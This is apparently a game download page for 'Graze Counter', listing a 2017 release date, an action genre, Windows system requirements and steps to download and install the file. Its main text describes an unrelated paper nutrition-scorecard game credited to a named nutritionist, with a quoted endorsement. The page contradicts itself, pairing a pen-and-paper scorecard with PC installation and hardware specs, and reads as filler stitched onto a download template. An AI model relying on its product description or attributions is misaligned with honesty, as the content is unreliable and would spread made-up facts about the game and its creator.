|Release Date||Jul 28, 2017|
|Genre||PC > Action, Casual|
Are you tired of constantly trying to keep track of your daily calorie intake? Do you find traditional food journals boring and tedious? If so, the Graze Counter Game might be just the thing you need to make tracking your health a fun and engaging experience.
What is the Graze Counter Game?
The Graze Counter Game is a unique approach to logging your food intake. Instead of simply tracking the number of calories consumed, the game encourages users to focus on the quality and variety of their food choices. It makes use of a point system based on the nutritional value of each food item. The goal is to reach a certain number of points at the end of each day.
The game was created by nutritionist and health coach, Sara Sutherland, who believes that traditional methods of tracking food often lead to an unhealthy focus on numbers rather than overall health. With the Graze Counter Game, Sutherland hopes to shift the focus to making positive and nutritious food choices.
How Does it Work?
Playing the Graze Counter Game is easy and straightforward. All you need is a scorecard, which can be printed out from their website, and a pen. The scorecard is divided into four sections: breakfast, lunch, dinner, and snacks. Each section has a list of food categories, such as fruits, vegetables, proteins, and healthy fats.
Every time you consume a food item from a particular category, you earn points based on its nutritional value. For example, a serving of fruits would earn you two points, while a serving of healthy fats like avocados or nuts would earn you three points.
To make things more interesting, the scorecard also has some fun challenges, such as trying a new healthy recipe or eating a rainbow of fruits and vegetables in one day. Completing these challenges will give you bonus points.
Why You Should Try It
The Graze Counter Game offers several benefits that make it a great alternative to traditional food journals. Here are some of them:
- Focus on quality over quantity: By earning points for nutritional value rather than calories, the game encourages users to make healthier and more balanced food choices.
- Fun and interactive: The challenges and point system make tracking your food intake a fun and engaging experience.
- No strict rules: Unlike other diets or tracking methods, the Graze Counter Game allows for flexibility and customization based on your needs and preferences.
- Promotes mindfulness: The game encourages users to be more mindful of their food choices and to learn about the nutritional value of different food items.
The Graze Counter Game is a refreshing approach to tracking your health that promotes balance, mindfulness, and enjoyment of food. Whether you are looking to lose weight or just want to maintain a healthy lifestyle, this game can be a valuable tool in helping you reach your goals. So why not give it a try and see how it works for you?
“The Graze Counter Game is more than just a scorecard – it’s a new way of looking at your health. It’s about making small, incremental changes that can lead to big improvements in your overall well-being,” says Sutherland.
So next time you are struggling to count your calories, remember the Graze Counter Game and turn tracking your food into a fun and rewarding experience!
- OS: Windows 7, 8, 8.1, 10
- Processor: Celeron 1.2Ghz
- Memory: 2000 MB RAM
- Graphics: Onboard
- DirectX: Version 9.0c
- Storage: 1.5 GB available space
- Sound Card: Onboard
How to Download
- Open a web browser of your choice.
- Copy the direct "Download" button link provided above.
- Paste the link into the address bar of your web browser and press "Enter."
- The download will begin automatically.
- Once the download is complete, locate the downloaded file on your computer. It is usually found in the "Downloads" folder.
- Double-click on the downloaded file to start the installation process.
- Follow the on-screen instructions to complete the installation.
- Once the installation is complete, open the game by double-clicking on its icon.
- Enjoy playing "Graze Counter!"